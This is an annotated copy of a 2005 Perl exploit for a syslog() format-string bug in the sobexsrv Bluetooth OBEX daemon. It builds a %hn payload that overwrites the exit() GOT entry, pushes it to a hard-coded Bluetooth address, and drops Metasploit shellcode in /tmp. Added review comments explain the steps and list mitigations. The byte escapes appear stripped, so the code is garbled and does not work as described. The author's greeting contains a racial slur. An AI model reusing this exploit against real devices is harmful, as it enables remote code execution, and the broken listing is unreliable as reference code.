# Title : sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit
# Published : 2005-12-03
# Author : Kevin Finisterre
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
# NOTE(review): defensive annotation of a 2005 public exploit for a
# long-obsolete Bluetooth OBEX daemon. The page's extraction appears to
# have stripped the backslash from every "\x.." escape (the literals below
# read as plain ASCII such as "x5ax19x05x08"), and likewise turned
# "$sc\n" / "$hi\n" into "$scn" / "$hin", which under no strict interpolate
# an undeclared variable as the empty string. As shown, this listing does
# not do what its comments describe; treat it as historical reference.
#
# Vulnerability class (per the title): the daemon hands attacker-controlled
# data to syslog() as the format argument. The standard mitigations remove
# the primitive entirely: always call syslog(prio, "%s", buf) with a fixed
# format, build with -Wformat-security (or -Werror=format-security) and
# FORTIFY_SOURCE, and link with full RELRO so relocation slots such as the
# one this script targets are read-only once the process has started.
#
# $retloc is the value the payload writes, which the author's comment
# indicates is where the pushed file contents (shellcode) are expected to
# sit; the filename itself is not usable because the daemon widens it to
# unicode (author's claim, cannot confirm from here).
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
# The two addresses below are, per the comment above, the two halfwords of
# the exit() jump slot (GOT entry) in the vulnerable binary -- build
# specific. Each receives one half of $retloc via the %hn directives in
# $string. Escapes are stripped on this page (see note at top).
$addy = "x5ax19x05x08";
$addy2 = "x58x19x05x08";
# Split $retloc into its low and high 16-bit halves; these become the field
# widths of the two %d conversions in $string so that the running output
# count at each %hn equals the halfword to be written. The high half is
# emitted first, then the low half is reached by wrapping through 0x10000
# (the count only ever increases). The 0x38 presumably accounts for the
# characters already emitted before the first %d (the two 4-byte addresses
# and whatever the daemon prefixes) -- not confirmable from this script.
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hin";
#print "lo: $lon";
# Command line for ussp-push (OBEX push client): a hard-coded target
# Bluetooth address and channel, the file to push, and a "filename" that
# carries the format-string payload. %27$hn / %28$hn are positional
# parameters (the \$ keeps Perl from interpolating them); the trailing
# "x41" x 200 is padding (200 repetitions of the literal shown).
$string = "./ussp-push 00:0B:0D:63:0B:CC@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\$hn%$lo.d%28\$hn" . "x41" x 200;
#print $string . "n";
# File contents: a 31-byte sled followed by what the author labels as a
# Metasploit /usr/bin/id payload. Same stripped-escape caveat applies.
$sc = "x90" x 31 . # Metasploit /usr/bin/id shellcode
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4cx46x4bx50x4ax35".
"x49x39x44x55x48x46x4ax46x4dx52x43x36x49x58x47x4e".
"x4ax56x4fx52x43x57x4ax46x42x50x4ax56x4fx32x44x56".
"x49x46x50x56x49x58x43x4ex44x45x4ax4ex4ex30x42x30".
"x42x30x42x50x4fx32x45x47x43x57x44x47x4fx32x44x56".
"x49x36x50x46x4fx52x49x56x46x36x42x50x47x45x43x35".
"x49x58x41x4ex4dx4cx42x38x5a";
# Writes the payload to a fixed, predictable path in /tmp using a two-arg
# open and a bareword handle, with no strict/warnings in effect. A fixed
# /tmp name is a symlink/pre-creation hazard for whoever runs the script.
# As shown, "$scn" interpolates an undeclared $scn, so the file is empty.
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$scn";
close(F);
# Single-string system() runs the command through /bin/sh; the payload's
# '%' and '$' are not shell metacharacters, but the shell still parses it.
system($string);